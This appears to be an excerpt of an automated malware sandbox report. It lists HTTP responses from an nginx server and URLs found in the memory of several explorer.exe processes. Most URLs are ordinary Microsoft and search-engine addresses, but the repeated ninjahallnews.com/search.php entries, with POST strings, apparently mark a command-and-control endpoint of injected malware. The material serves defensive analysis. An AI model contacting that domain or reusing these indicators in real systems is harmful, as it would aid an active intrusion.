    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:23:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:24:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:24:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:24:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:25:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:26:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:26:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:26:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:26:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 16:26:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
    Source: explorer.exe, 00000002.00000000.2219404532.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000002.00000000.2219404532.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000002.00000000.2219404532.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000002.00000000.2219404532.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000002.00000000.2218524683.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2216870595.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2218534895.0000000007B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
    Source: explorer.exe, 00000002.00000000.2222332214.000000000C36B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: explorer.exe, 00000002.00000000.2219776484.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
    Source: explorer.exe, 00000002.00000000.2222332214.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
    Source: explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000002.00000000.2219404532.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000002.00000000.2219404532.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: explorer.exe, 0000000D.00000003.3197507522.0000000002AA3000.00000004.00000020.00020000.00000000.sdmp, 98A5.tmp.13.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: explorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3226508578.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com//
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/application/x-www-form-urlencodedMozilla/5.0
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/earch.php;L
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3175208514.0000000000E79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4580797896.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4580427782.0000000000949000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4580422286.0000000002A68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4580424413.0000000000BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.php
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3175208514.0000000000E79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4580797896.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4580427782.0000000000949000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4580422286.0000000002A68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4580424413.0000000000BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.phpMozilla/5.0
    Source: explorer.exe, 0000000D.00000002.3226508578.0000000002A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ninjahallnews.com/search.phpo
    Source: explorer.exe, 00000002.00000000.2222332214.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
    Source: explorer.exe, 00000002.00000000.2222332214.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
    Source: explorer.exe, 00000002.00000000.2218006432.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
